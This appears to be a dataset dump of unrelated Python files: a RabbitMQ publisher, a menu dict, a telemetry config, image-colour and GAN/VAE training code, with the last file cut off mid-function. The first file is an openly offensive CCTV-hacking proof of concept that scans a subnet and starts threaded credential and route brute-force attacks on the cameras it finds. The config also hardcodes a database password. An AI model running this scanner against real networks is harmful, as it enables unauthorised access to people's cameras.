text stringlengths 38 1.54M |
|---|
import pyfiglet #pip
from colorama import init
from termcolor import colored
import sys, threading, os, time, json
from libs import getports as gp
from libs import attack_creds_first as attack
from libs import attack_routes_first as routeattack
init()
ascii_banner = pyfiglet.figlet_format("Pyllywood.")
print("{}\n{}\n\n".format(ascii_banner, "Hollywood-style CCTV hacking - PoC"))
#gp.discover('192.168.2.0/24') # Custom port scan (slower detection)
gp.masscan_target('192.168.2.0/24') # Masscan (quicker detection) - DEBUG logging have to vanish somehow
print(colored("[*] Giving 10 seconds for threads to die...", 'yellow'))
time.sleep(10)
totalPortCount = 0
portScanResults = gp.targetList
for target in portScanResults:
for port in portScanResults[target]:
totalPortCount += 1
if totalPortCount == 0:
print(colored("[!] No targets found. Try a different network.", 'red'))
sys.exit(0)
print(colored("[*] Found {} targets with a total of {} ports".format(len(portScanResults), totalPortCount), 'yellow'))
print(colored("[-] All targets that do NOT require authentication will be excluded - these are not supported yet", 'red'))
print(colored("[*] Starting credentials and routes attacks. Please be patient...", 'yellow'))
for target in portScanResults:
for port in portScanResults[target]:
if portScanResults[target][port] == None:
print(colored("[*] Target {}:{} requires a valid route first...".format(target, port), 'cyan'))
thread = threading.Thread(target = routeattack.findValidRoutes, args = (target, port))
thread.start()
if threading.active_count() == 100:
thread.join()
else:
print(colored("[*] Target {}:{} requires a valid account first...".format(target, port), 'cyan'))
thread = threading.Thread(target = attack.attackCredentials, args = (target, port, portScanResults[target][port]))
thread.start()
if threading.active_count() == 100:
thread.join()
|
import pika
import json
# First thing to do is establish a connection with RabbitMQ server
# and create a new channel
# A connection represents a real TCP connection to the message broker,
# whereas a channel is a virtual connection (AMQP connection) inside it.
# This way you can use as many (virtual) connections as you want inside
# your application without overloading the broker with TCP connections.
credentials = pika.PlainCredentials("user", "password")
parameters = pika.ConnectionParameters(
host="localhost",
port=5672,
virtual_host="/", # provides a way to segregate applications using the same RabbitMQ instance
credentials=credentials)
connection = pika.BlockingConnection(parameters)
channel = connection.channel()
# create a queue
channel.queue_declare(queue="hello")
message = {
"job": {},
"cwl": {}
}
# In RabbitMQ a message can never be sent directly to the queue, it always needs to go through an exchange
channel.basic_publish(
exchange="", # default exchange, always Direct type
routing_key="hello", # in this case it's a queue name, but can be pattern if Exchange type is topic
body=json.dumps(message) # should be serialized to string
)
print(f"Message sent \n{message}")
# Make sure the network buffers are flushed and our message is actually delivered to RabbitMQ
connection.close() |
products = {
'test1': {
'path': 'https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcRWIqNg8W4CdYI0RNvT4zEjmfjE5mLqy06R7w&usqp=CAU',
'name': 'Маргарита',
'composition': 'тесто на закваске\nсоус для пиццы\nсырный соус, сыр мозарелло, \nпомидор',
'price': 'Цена: 65 000 сум',
'button': 'Тестовое блюдо',
'section': 'Тестовая секция'
},
'test2': {
'path': 'https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcRWIqNg8W4CdYI0RNvT4zEjmfjE5mLqy06R7w&usqp=CAU',
'name': 'Маргаритка',
'composition': 'тесто на закваске\nсоус для пиццы\nсырный соус, сыр мозарелло, \nпомидор',
'price': 'Цена: 5 000 сум',
'button': 'Тестовое блюдо 2',
'section': 'Тестовая секция'
},
'test3': {
'path': 'https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcRWIqNg8W4CdYI0RNvT4zEjmfjE5mLqy06R7w&usqp=CAU',
'name': 'Маргаритац',
'composition': 'тесто на закваске\nсоус для пиццы\nсырный соус, сыр мозарелло, \nпомидор',
'price': 'Цена: 65 001 сум',
'button': 'Тестовое блюдо 3',
'section': 'Тестовая секция 2'
},
'test4': {
'path': 'https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcRWIqNg8W4CdYI0RNvT4zEjmfjE5mLqy06R7w&usqp=CAU',
'name': 'Маргариткац',
'composition': 'тесто на закваске\nсоус для пиццы\nсырный соус, сыр мозарелло, \nпомидор',
'price': 'Цена: 5 001 сум',
'button': 'Тестовое блюдо 4',
'section': 'Тестовая секция 2'
},
} |
#This is the data from the car
SOURCEDB = 'mysql+mysqldb://solar:Phenix@localhost/solarcar'
#This is the Database used by Telemetry to display data, there are two basic options
TELEMETRYDB = 'sqlite:///temp.db'
#Use database that only exists in memory. Use this if you want an easy setup
#Pros: Don't require mysql on the laptop/box running Telemetry, starts fresh when code starts again
#Cons: Slow to start up, no persistant data, sqlite doesn't support 'decimal' type so rounding errors will occur as the data gets converted to float
#TELEMETRYDB = 'mysql+mysqldb://solar:Phenix@localhost/telemetry'
#Use full mysql database. Use this for a more reliable setup
#Pros: Fast, Persistant Data
#Cons: MySQL can be hard to install
ORGNAME = "OSU Solar Vehicle Team"
CARNAME = "Phoenix"
#How long (in ms) should the JavaScript wait after recieving it's last update to request it again?
#Note: Because Short graphs pull so much data, this value is multiplied by 10, change app/templates/short.html if you don't like this behavior
UPDATE = 250
#Google Maps API Key, get one at https://console.developers.google.com
GMAPSAPIKEY = "" |
import math
import numpy as np
def im2c(im, w2c, color):
# input im should be DOUBLE !
# color=0 is color names out
# color=-1 is colored image with color names out
# color=1-11 is prob of colorname=color out;
# color=-1 return probabilities
# order of color names:
# black , blue , brown , grey , green , orange , pink , purple , red , white , yellow
color_values = [[0, 0, 0], [0, 0, 1], [0.5, 0.4, 0.25], [0.5, 0.5, 0.5], [0, 1, 0], [1, 0.8, 0], [1, 0.5, 1], [1, 0, 1], [1, 0, 0], [1, 1, 1], [1, 1, 0]]
#if nargin < 3:
# color = 0
RR = im[:, :, 0]
GG = im[:, :, 1]
BB = im[:, :, 2]
RR1 = np.zeros((RR.shape[0] * RR.shape[1], 1))
GG1 = np.zeros((GG.shape[0] * GG.shape[1], 1))
BB1 = np.zeros((BB.shape[0] * BB.shape[1], 1))
#index_im = 1+floor(RR(:)/8)+32*floor(GG(:)/8)+32*32*floor(BB(:)/8);
for i in range(im.shape[1]):
for j in range(im.shape[0]):
RR1[i * im.shape[0] + j][0] = math.floor(RR[j, i] / 8.0)
GG1[i * im.shape[0] + j][0] = math.floor(GG[j, i] / 8.0)
BB1[i * im.shape[0] + j][0] = math.floor(BB[j, i] / 8.0)
#indexes: so need +1 ?? !!!! w2c from matlab, so it need ~~~
index_im = 1 + RR1 + 32 * GG1 + 32 * 32 * BB1
index_im = index_im.astype('int')
index_im = index_im - 1
if color == 0:
w2cM = np.argmax(w2c, axis=1)
w2cM = w2cM + 1
w2cM = w2cM[index_im[:]]
out = w2cM.reshape((im.shape[0], im.shape[1]), order='F')
if (color > 0 and color < 12) or (color == -1):
print("ERROR im2c")
exit()
if color == -2:
w2cM = w2c[index_im[:]][:]
out = w2cM.reshape((im.shape[0], im.shape[1], w2c.shape[1]), order='F')
return out
"""
if color >= 0 and color < 11:
w2cM = w2c[:, color]
w2cM = w2cM[index_im[:]]
out = w2cM.reshape((im.shape[0], im.shape[1]))
if color == -1:
out = im
w2cM = np.argmax(w2c, axis=1)
w2cM = w2cM[index_im[:]]
out2 = w2cM.reshape((im.shape[0], im.shape[1]))
for i in range(im.shape[0]):
for j in range(im.shape[1]):
for c in range(3):
out[i, j, c] = color_values[out2[i, j], c] * 255
"""
|
from infogan.models.regularized_gan import RegularizedGAN
import prettytensor as pt
import tensorflow as tf
import numpy as np
from progressbar import ETA, Bar, Percentage, ProgressBar
from infogan.misc.distributions import Bernoulli, Gaussian, Categorical
import sys
import os
import time
from infogan.misc.utils import save_images, inverse_transform, compute_cluster_scores
from sklearn.preprocessing import normalize
TINY = 1e-8
logSamples = 64
class InfoGANTrainer(object):
def __init__(self,
model,
batch_size=128,
dataset=None,
val_dataset=None,
isTrain=True,
exp_name="experiment",
log_dir="logs",
checkpoint_dir="ckt",
samples_dir="samples",
max_epoch=100,
snapshot_interval=500,
info_reg_coeff=1.0,
discriminator_learning_rate=2e-4,
generator_learning_rate=2e-4,
semiSup = False,
):
"""
:type model: RegularizedGAN
"""
self.model = model
self.dataset = dataset
self.val_dataset = val_dataset
self.batch_size = batch_size
self.max_epoch = max_epoch
self.exp_name = exp_name
self.log_dir = log_dir
self.samples_dir = samples_dir
self.checkpoint_dir = checkpoint_dir
self.snapshot_interval = snapshot_interval
self.generator_learning_rate = generator_learning_rate
self.discriminator_learning_rate = discriminator_learning_rate
self.info_reg_coeff = info_reg_coeff
self.discriminator_trainer = None
self.generator_trainer = None
self.input_tensor = None
self.log_vars = []
self.semiSup = semiSup
self.input_labels = None
def init_opt(self):
if self.dataset.name == "mnist":
shape = [self.dataset.image_dim]
elif 'FOLDER' in self.dataset.name:
print "Selected folder image"
shape = list(self.dataset.output_size)
else:
shape = [self.dataset.output_size, self.dataset.output_size, 3]
self.input_tensor = input_tensor = tf.placeholder(tf.float32, [self.batch_size] + shape)
with pt.defaults_scope(phase=pt.Phase.train):
self.z_var = self.model.latent_dist.sample_prior(self.batch_size)
fake_x, _ = self.model.generate(self.z_var)
self.sample_x, _ = self.model.generate(self.z_var)
if self.semiSup:
self.sup_d = self.model.discriminateSup(self.input_tensor,self.dataset.dataObj.getNclasses())
self.fake_d = self.model.discriminate(fake_x)
self.real_d = self.model.discriminate(input_tensor)
self.d_feat_real = self.real_d['features']
if self.semiSup:
self.input_labels = tf.placeholder(tf.float32, [self.batch_size,self.dataset.dataObj.getNclasses()])
discriminator_loss_sup = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(self.sup_d['logits'], self.input_labels))
discriminator_loss_real = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(self.real_d['logits'],tf.zeros_like(self.real_d['logits'])))
discriminator_loss_fake = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(self.fake_d['logits'],tf.ones_like(self.real_d['logits'])))
discriminator_loss = discriminator_loss_real + discriminator_loss_fake + discriminator_loss_sup
generator_loss = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(self.fake_d['logits'],tf.zeros_like(self.fake_d['logits'])))
self.log_vars.append(("discriminator_sup_loss", discriminator_loss_sup))
else:
discriminator_loss_real = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(self.real_d['logits'], tf.ones_like(self.real_d['prob'])))
discriminator_loss_fake = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(self.fake_d['logits'], tf.zeros_like(self.fake_d['prob'])))
discriminator_loss = discriminator_loss_real + discriminator_loss_fake
generator_loss = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(self.fake_d['logits'], tf.ones_like(self.fake_d['prob'])))
self.log_vars.append(("discriminator_loss_real", discriminator_loss_real))
self.log_vars.append(("discriminator_loss_fake", discriminator_loss_fake))
self.log_vars.append(("discriminator_loss", discriminator_loss))
self.log_vars.append(("generator_loss", generator_loss))
real_d_sum = tf.histogram_summary("real_d", self.real_d['prob'])
fake_d_sum = tf.histogram_summary("fake_d", self.fake_d['prob'])
if self.model.is_reg:
reg_z = self.model.reg_z(self.z_var)
mi_est = tf.constant(0.)
cross_ent = tf.constant(0.)
# compute for discrete and continuous codes separately
# discrete:
if len(self.model.reg_disc_latent_dist.dists) > 0:
disc_reg_z = self.model.disc_reg_z(reg_z)
disc_reg_dist_info = self.model.disc_reg_dist_info(self.fake_d['reg_dist_info']) # Returns a dictionary of activations for each distribution
disc_log_q_c_given_x = self.model.reg_disc_latent_dist.logli(disc_reg_z, disc_reg_dist_info)
disc_log_q_c = self.model.reg_disc_latent_dist.logli_prior(disc_reg_z)
disc_cross_ent = tf.reduce_mean(-disc_log_q_c_given_x)
disc_ent = tf.reduce_mean(-disc_log_q_c)
disc_mi_est = disc_ent - disc_cross_ent
mi_est += disc_mi_est
cross_ent += disc_cross_ent
self.log_vars.append(("MI_disc", disc_mi_est))
self.log_vars.append(("CrossEnt_disc", disc_cross_ent))
discriminator_loss -= self.info_reg_coeff * disc_mi_est
generator_loss -= self.info_reg_coeff * disc_mi_est
real_disc_reg_dist_info = self.model.disc_reg_dist_info(self.real_d['reg_dist_info'])
assert len(real_disc_reg_dist_info.keys()) == 1 # currently support only one categorical distribution
self.disc_prob = real_disc_reg_dist_info[real_disc_reg_dist_info.keys()[0]]
if len(self.model.reg_cont_latent_dist.dists) > 0:
cont_reg_z = self.model.cont_reg_z(reg_z)
cont_reg_dist_info = self.model.cont_reg_dist_info(self.fake_d['reg_dist_info'])
cont_log_q_c_given_x = self.model.reg_cont_latent_dist.logli(cont_reg_z, cont_reg_dist_info)
cont_log_q_c = self.model.reg_cont_latent_dist.logli_prior(cont_reg_z)
cont_cross_ent = tf.reduce_mean(-cont_log_q_c_given_x)
cont_ent = tf.reduce_mean(-cont_log_q_c)
cont_mi_est = cont_ent - cont_cross_ent
mi_est += cont_mi_est
cross_ent += cont_cross_ent
self.log_vars.append(("MI_cont", cont_mi_est))
self.log_vars.append(("CrossEnt_cont", cont_cross_ent))
discriminator_loss -= self.info_reg_coeff * cont_mi_est
generator_loss -= self.info_reg_coeff * cont_mi_est
for idx, dist_info in enumerate(self.model.reg_latent_dist.split_dist_info(self.fake_d['reg_dist_info'])):
if "stddev" in dist_info:
self.log_vars.append(("max_std_%d" % idx, tf.reduce_max(dist_info["stddev"])))
self.log_vars.append(("min_std_%d" % idx, tf.reduce_min(dist_info["stddev"])))
self.log_vars.append(("MI", mi_est))
self.log_vars.append(("CrossEnt", cross_ent))
all_vars = tf.trainable_variables()
d_vars = [var for var in all_vars if var.name.startswith('d_')]
g_vars = [var for var in all_vars if var.name.startswith('g_')]
discriminator_optimizer = tf.train.AdamOptimizer(self.discriminator_learning_rate, beta1=0.5)
self.discriminator_trainer = pt.apply_optimizer(discriminator_optimizer, losses=[discriminator_loss],
var_list=d_vars)
generator_optimizer = tf.train.AdamOptimizer(self.generator_learning_rate, beta1=0.5)
self.generator_trainer = pt.apply_optimizer(generator_optimizer, losses=[generator_loss], var_list=g_vars)
for k, v in self.log_vars:
tf.scalar_summary(k, v)
if self.model.is_reg and self.dataset.name != 'imagenet':
if self.model.encoder_dim <= 12: # Ugly conditioning!!! Fix later
with pt.defaults_scope(phase=pt.Phase.test):
with tf.variable_scope("model", reuse=True) as scope:
self.visualize_all_factors()
def visualize_all_factors(self):
with tf.Session():
fixed_noncat = np.concatenate([
np.tile(
self.model.nonreg_latent_dist.sample_prior(10).eval(),
[10, 1]
),
self.model.nonreg_latent_dist.sample_prior(self.batch_size - 100).eval(),
], axis=0)
fixed_cat = np.concatenate([
np.tile(
self.model.reg_latent_dist.sample_prior(10).eval(),
[10, 1]
),
self.model.reg_latent_dist.sample_prior(self.batch_size - 100).eval(),
], axis=0)
offset = 0
for dist_idx, dist in enumerate(self.model.reg_latent_dist.dists):
if isinstance(dist, Gaussian):
assert dist.dim == 1, "Only dim=1 is currently supported"
c_vals = []
for idx in xrange(10):
c_vals.extend([-1.0 + idx * 2.0 / 9] * 10)
c_vals.extend([0.] * (self.batch_size - 100))
vary_cat = np.asarray(c_vals, dtype=np.float32).reshape((-1, 1))
cur_cat = np.copy(fixed_cat)
cur_cat[:, offset:offset+1] = vary_cat
offset += 1
elif isinstance(dist, Categorical):
lookup = np.eye(dist.dim, dtype=np.float32)
cat_ids = []
for idx in xrange(dist.dim):
cat_ids.extend([idx] * 10)
cat_ids.extend([0] * (self.batch_size - 10 * dist.dim))
print cat_ids
cur_cat = np.copy(fixed_cat)
print cur_cat.shape
cur_cat[:, offset:offset+dist.dim] = lookup[cat_ids]
offset += dist.dim
elif isinstance(dist, Bernoulli):
assert dist.dim == 1, "Only dim=1 is currently supported"
lookup = np.eye(dist.dim, dtype=np.float32)
cat_ids = []
for idx in xrange(10):
cat_ids.extend([int(idx / 5)] * 10)
cat_ids.extend([0] * (self.batch_size - 100))
cur_cat = np.copy(fixed_cat)
cur_cat[:, offset:offset+dist.dim] = np.expand_dims(np.array(cat_ids), axis=-1)
# import ipdb; ipdb.set_trace()
offset += dist.dim
else:
raise NotImplementedError
z_var = tf.constant(np.concatenate([fixed_noncat, cur_cat], axis=1))
x_dist_flat, x_dist_info = self.model.generate(z_var)
# just take the mean image
transform_type = 'output_dist'
if isinstance(self.model.output_dist, Bernoulli):
img_var = x_dist_info["p"]
elif isinstance(self.model.output_dist, Gaussian):
img_var = x_dist_info["mean"]
elif self.model.output_dist is None:
img_var = x_dist_flat
transform_type = None
else:
raise NotImplementedError
if transform_type == 'output_dist':
img_var = self.dataset.inverse_transform(img_var)
else:
img_var = inverse_transform(img_var)
rows = dist.dim
cols = 10
img_var = tf.reshape(img_var, [self.batch_size] + list(self.dataset.image_shape))
img_var = img_var[:rows * cols, :, :, :]
imgs = tf.reshape(img_var, [rows, cols] + list(self.dataset.image_shape))
stacked_img = []
for row in xrange(rows):
row_img = []
for col in xrange(cols):
row_img.append(imgs[row, col, :, :, :])
stacked_img.append(tf.concat(1, row_img))
imgs = tf.concat(0, stacked_img)
imgs = tf.expand_dims(imgs, 0)
tf.image_summary("image_%d_%s" % (dist_idx, dist.__class__.__name__), imgs)
def getFeedDict(self,dataset,semiSup):
x, labels = dataset.next_batch(self.batch_size)
if semiSup:
feed_dict = {self.input_tensor: x, self.input_labels: labels}
else:
feed_dict = {self.input_tensor: x}
return feed_dict
def train(self, sess):
init = tf.initialize_all_variables()
sess.run(init)
summary_op = tf.merge_all_summaries()
summary_writer = tf.train.SummaryWriter(self.log_dir, sess.graph)
saver = tf.train.Saver()
counter = 0
log_vars = [x for _, x in self.log_vars]
log_keys = [x for x, _ in self.log_vars]
start_time = time.time()
for epoch in range(self.max_epoch):
widgets = ["epoch #%d|" % epoch, Percentage(), Bar(), ETA()]
print("DatasetName ",self.dataset.name)
print('batchIdx ',self.dataset.batch_idx)
pbar = ProgressBar(maxval=self.dataset.batch_idx['train'], widgets=widgets)
pbar.start()
all_log_vals = []
for i in range(self.dataset.batch_idx['train']):
pbar.update(i)
feed_dict = self.getFeedDict(self.dataset,self.semiSup)
all_log_vals = sess.run([self.discriminator_trainer] + log_vars, feed_dict)[1:]
for ii in range(5):
sess.run(self.generator_trainer, feed_dict)
counter += 1
if (counter % self.snapshot_interval == 0):
snapshot_name = "%s_%s" % (self.exp_name, str(counter))
fn = saver.save(sess, "%s/%s.ckpt" % (self.checkpoint_dir, snapshot_name))
print("Model saved in file: %s" % fn)
# Save samples
if counter % 10 == 0:
samples = sess.run(self.sample_x, feed_dict)
samples = samples[:logSamples, ...]
sqS = int(np.sqrt(logSamples))
if self.dataset.name != "mnist":
samples = inverse_transform(samples)
#xTolog = inverse_transform(x)[:logSamples, ...]
#save_images(xTolog, [sqS, sqS],'{}/trainDATA_{:02d}_{:04d}.png'.format(self.samples_dir, epoch, counter))
save_images(samples, [sqS, sqS],'{}/train_{:02d}_{:04d}.png'.format(self.samples_dir, epoch, counter))
# Test on validation (test) set
if counter % 500 == 1:
print "Validating current model on val set..."
self.validate(sess)
# Get next batch
#feed_dict = self.getFeedDict(self.dataset, self.semiSup)
# Write summary to log file
summary_str = sess.run(summary_op, feed_dict)
summary_writer.add_summary(summary_str, counter)
log_line = "; ".join("%s: %s" % (str(k), str(v)) for k, v in zip(log_keys, all_log_vals))
print("Epoch %d | time: %4.4fs " % (epoch, time.time() - start_time) + log_line)
sys.stdout.flush()
if np.any(np.isnan(all_log_vals)):
raise ValueError("NaN detected!")
print "Train ended"
# Test on validation (test) set
snapshot_name = "last"
fn = saver.save(sess, "%s/%s.ckpt" % (self.checkpoint_dir, snapshot_name))
print("Model saved in file: %s" % fn)
def validate(self, sess):
pred_labels = np.array([], dtype=np.int16).reshape(0,)
pred_labels_kmeans = np.array([], dtype=np.int16).reshape(0,)
labels = []
n_clusters = self.val_dataset.n_labels
if self.model.is_reg is True and self.model.encoder_dim == n_clusters:
predict_directly = True
else:
predict_directly = False
trainX = np.array([]).reshape(0, 0)
def pool_features(feat, pool_type='avg'):
if len(feat.shape) >= 3:
if pool_type == 'avg':
feat = feat.mean(axis=(1, 2))
if pool_type == 'max':
feat = feat.mean(axis=(1, 2))
return feat.reshape((feat.shape[0], feat.shape[-1]))
print "Getting all the training features."
for ii in range(self.val_dataset.batch_idx['train']):
feed_dict = self.getFeedDict(self.dataset, self.semiSup)
d_features = sess.run(self.d_feat_real, feed_dict)
d_features = pool_features(d_features, pool_type='avg')
if trainX.shape[0] == 0: # Is empty
trainX = d_features
else:
trainX = np.concatenate((trainX, d_features), axis=0)
trainX_norm = normalize(trainX, axis=1, norm='l2')
print "Learning the clusters."
from sklearn.cluster import KMeans
kmeans = KMeans(n_clusters=n_clusters, init='k-means++').fit(trainX_norm)
print "Extracting features from val set and predicting from it."
for ii in range(self.val_dataset.batch_idx['val']):
x, batch_labels = self.val_dataset.next_batch(self.batch_size, split="val")
if type(batch_labels) == np.ndarray:
batch_labels = list(batch_labels)
labels = labels + batch_labels
if predict_directly:
d_prob = sess.run(self.disc_prob, {self.input_tensor: x})
batch_pred_labels = np.argmax(d_prob, axis=1)
pred_labels = np.concatenate((pred_labels, batch_pred_labels))
d_features = sess.run(self.d_feat_real, {self.input_tensor: x})
d_features = pool_features(d_features, pool_type='avg')
d_features_norm = normalize(d_features, axis=1, norm='l2')
batch_pred_labels_kmeans = kmeans.predict(d_features_norm)
pred_labels_kmeans = np.concatenate((pred_labels_kmeans, batch_pred_labels_kmeans))
if predict_directly:
compute_cluster_scores(labels=np.asarray(labels), pred_labels=pred_labels, path=os.path.join(self.log_dir, 'scores.txt'))
compute_cluster_scores(labels=np.asarray(labels), pred_labels=pred_labels_kmeans, path=os.path.join(self.log_dir, 'scores_kmeans.txt'))
|
from __future__ import print_function
import numpy as np
import argparse
import torch
import torch.utils.data
import torch.nn as nn
import torch.optim as optim
from torch.autograd import Variable
from torchvision import datasets, transforms
import torch.nn.functional as F
import cv2 as cv
import random
parser = argparse.ArgumentParser(description='PyTorch MNIST Example')
parser.add_argument('--batch-size', type=int, default=64, metavar='N',
help='input batch size for training (default: 64)')
parser.add_argument('--epochs', type=int, default=10, metavar='N',
help='number of epochs to train (default: 2)')
parser.add_argument('--seed', type=int, default=1, metavar='S',
help='random seed (default: 1)')
parser.add_argument('--log-interval', type=int, default=10, metavar='N',
help='how many batches to wait before logging training status')
parser.add_argument('--sample-size', type=int, default=100, metavar='N',
help='number of samples to generate (should be perfect square)')
parser.add_argument('--eval-interval', type=int, default=1, metavar='N',
help='how many batches to wait before logging training status')
parser.add_argument('--save-interval', type=int, default=10, metavar='N',
help='how many batches to wait before logging training status')
parser.add_argument("--load-model", type=str,
help="The file containing already trained model.")
parser.add_argument("--save-model", default="vae_cifar", type=str,
help="The file containing already trained model.")
parser.add_argument("--save-image", default="vae_cifar", type=str,
help="The file containing already trained model.")
parser.add_argument("--temperature", default=1, type=float,
help="The file containing already trained model.")
parser.add_argument("--mode", type=str, default="train-eval", choices=["train", "eval", "train-eval"],
help="Operating mode: train and/or test.")
parser.add_argument("--num-samples", default=1, type=int,
help="The number of samples to draw from distribution")
parser.add_argument("--sigma", default=100, type=float,
help="The number of samples to draw from distribution")
args = parser.parse_args()
torch.manual_seed(args.seed)
kwargs = {}
if "train" in args.mode:
train_loader = torch.utils.data.DataLoader(
datasets.CIFAR10('./data', train=True, download=True,
transform=transforms.ToTensor()),
batch_size=args.batch_size, shuffle=True, **kwargs)
if "eval" in args.mode:
test_loader = torch.utils.data.DataLoader(
datasets.CIFAR10('./data', train=False, transform=transforms.ToTensor()),
batch_size=args.batch_size, shuffle=True, **kwargs)
test_loader2 = torch.utils.data.DataLoader(
datasets.CIFAR10('./data', train=False, transform=transforms.ToTensor()),
batch_size=1, shuffle=False, **kwargs)
if args.mode == "eval":
if not args.load_model:
raise ValueError("Need which model to evaluate")
args.epoch = 1
args.eval_interval = 1
class VAE(nn.Module):
# def __init__(self):
# super(VAE, self).__init__()
# self.z_size = 60
# # self.cat_size = 10
# self.fc1 = nn.Sequential(
# # nc * 32 * 32
# nn.Conv2d(3, 32, 4, 2, 1, bias=False),
# nn.LeakyReLU(0.2, inplace=True),
# # 32 x 8 x 8
# nn.Conv2d(32, 32, 4, 2, 1, bias=False),
# nn.BatchNorm2d(32),
# nn.LeakyReLU(0.2, inplace=True),
# nn.Conv2d(32, 32, 4, 2, 1, bias=False),
# nn.BatchNorm2d(32),
# nn.LeakyReLU(0.2, inplace=True)
# # 32 x 4 x 4
# )
# self.fc21 = nn.Linear(512, self.z_size)
# self.fc22 = nn.Linear(512, self.z_size)
# # self.fc23 = nn.Linear(512, self.cat_size)
# # self.fc23b = nn.Linear(self.cat_size, self.cat_size)
# self.fc3 = nn.Linear(self.encoder_size(), 32*4*4)
# self.fc4 = nn.Sequential(
# # state size. 32 x 4 x 4
# nn.ConvTranspose2d(32, 32, 4, 2, 1, bias=False),
# nn.BatchNorm2d(32),
# nn.ReLU(True),
# # state size. 32 x 8 x 8
# nn.ConvTranspose2d(32, 32, 4, 2, 1, bias=False),
# nn.BatchNorm2d(32),
# nn.ReLU(True),
# nn.ConvTranspose2d(32, 3, 4, 2, 1, bias=False),
# nn.Sigmoid()
# # state size. 3 x 32 x 32
# )
# self.relu = nn.ReLU()
# self.sigmoid = nn.Sigmoid()
# self.softmax = nn.Softmax()
def __init__(self):
super(VAE, self).__init__()
self.z_size = 60
# self.cat_size = 10
self.fc1 = nn.Sequential(
# state size. (ndf) x 32 x 32
nn.Conv2d(3, 16 * 2, 4, 2, 1, bias=False),
nn.BatchNorm2d(16 * 2),
nn.LeakyReLU(0.2, inplace=True),
# state size. (16*2) x 16 x 16
nn.Conv2d(16 * 2, 16 * 4, 4, 2, 1, bias=False),
nn.BatchNorm2d(16 * 4),
nn.LeakyReLU(0.2, inplace=True),
# state size. (16*4) x 8 x 8
nn.Conv2d(16 * 4, 16 * 8, 4, 2, 1, bias=False)
)
self.fc21 = nn.Linear(2048, self.z_size)
self.fc22 = nn.Linear(2048, self.z_size)
# self.fc23 = nn.Linear(512, self.cat_size)
# self.fc23b = nn.Linear(self.cat_size, self.cat_size)
self.fc3 = nn.Linear(self.encoder_size(), 16*8*4*4)
self.fc4 = nn.Sequential(
# input is Z, going into a convolution
# nn.ConvTranspose2d(self.encoder_size(), 16 * 8, 4, 1, 0, bias=False),
# nn.BatchNorm2d(16 * 8),
# nn.ReLU(True),
# state size. (16*8) x 4 x 4
nn.ConvTranspose2d(16 * 8, 16 * 4, 4, 2, 1, bias=False),
nn.BatchNorm2d(16 * 4),
nn.ReLU(True),
# state size. (16*4) x 8 x 8
nn.ConvTranspose2d(16 * 4, 16 * 2, 4, 2, 1, bias=False),
nn.BatchNorm2d(16 * 2),
nn.ReLU(True),
# state size. (16*2) x 16 x 16
nn.ConvTranspose2d(16 * 2, 3, 4, 2, 1, bias=False),
nn.Sigmoid()
)
self.relu = nn.ReLU()
self.sigmoid = nn.Sigmoid()
self.softmax = nn.Softmax()
def encoder_size(self):
return self.z_size #+ self.cat_size
def encode(self, x):
h1 = self.fc1(x)
# print(h1)
h1 = h1.view(-1, 2048)
return self.fc21(h1), self.fc22(h1)#, self.fc23(h1)
def reparametrize_normal(self, mu, logvar):
std = logvar.mul(0.5).exp_()
eps = torch.FloatTensor(std.size()).normal_()
eps = Variable(eps)
eps = eps.mul(std)
return eps.mul(std).add_(mu)
def sample_gumbel(self, size):
eps = torch.FloatTensor(size).uniform_(0,1)
eps = eps.add_(1e-9).log().mul_(-1).add_(1e-9).log().mul_(-1)
eps = Variable(eps)
return eps
def reparametrize_gumbel(self, categorical, hard=False):
temperature = args.temperature
noise = self.sample_gumbel(categorical.size())
x = (categorical + noise)/temperature
x = F.softmax(x)
if hard:
max_val, _ = torch.max(x, x.dim() - 1, keepdim=True)
x_hard = x == max_val.expand_as(x)
tmp = x_hard.float() - x
tmp2 = tmp.clone()
tmp2.detach_()
x = tmp2 + x
return x.view_as(categorical)
# def decode(self, z, c):
# c = self.fc23b(c)
# z = torch.cat([z,c], 1)
# h3 = self.relu(self.fc3(z))
# h3 = h3.view(-1,32,4,4)
# x = self.fc4(h3)
# # print(x)
# return x
def decode(self, z):
h3 = self.relu(self.fc3(z))
h3 = h3.view(-1,16*8,4,4)
return self.fc4(h3)
# def sampleAndDecode(self, mu, logvar, categorical):
# z = self.reparametrize_normal(mu, logvar)
# c = self.reparametrize_gumbel(categorical)
# return self.decode(z, c), mu, logvar, categorical
# def forward(self, x):
# mu, logvar, categorical = self.encode(x)
# return self.sampleAndDecode(mu, logvar, categorical)
def sampleAndDecode(self, mu, logvar):
z = self.reparametrize_normal(mu, logvar)
return self.decode(z), mu, logvar
def forward(self, x):
mu, logvar = self.encode(x)
return self.sampleAndDecode(mu, logvar)
model = VAE()
reconstruction_function = nn.MSELoss()
# reconstruction_function = nn.BCELoss()
reconstruction_function.size_average = False
# def loss_function(recon_xs, x, mu, logvar, categorical):
# BCE = 0
# for recon_x in recon_xs:
# BCE += 0.001*reconstruction_function(recon_x, x)
# # see Appendix B from VAE paper:
# # Kingma and Welling. Auto-Encoding Variational Bayes. ICLR, 2014
# # https://arxiv.org/abs/1312.6114
# # 0.5 * sum(1 + log(sigma^2) - mu^2 - sigma^2)
# KLD_element = mu.pow(2).add_(logvar.exp()).mul_(-1).add_(1).add_(logvar)
# KLD = torch.sum(KLD_element).mul_(-0.5) * args.sigma
# # print(KLD)
# # add categorical loss function here
# # print(categorical)
# # print(torch.sum(categorical.exp().mul(categorical.exp().mul(model.cat_size).add_(1e-9).log())))
# # KLD += torch.sum(categorical.exp().mul(categorical.exp().mul(model.cat_size).add_(1e-9).log()))
# c = F.softmax(categorical)
# # KLD += torch.sum(c.mul(c.mul(model.cat_size).add_(1e-9).log()))
# KLD += torch.sum(c.mul(c.mul(model.cat_size).add_(1e-9).log()))
# return BCE + KLD
def loss_function(recon_xs, x, mu, logvar):
BCE = 0
for recon_x in recon_xs:
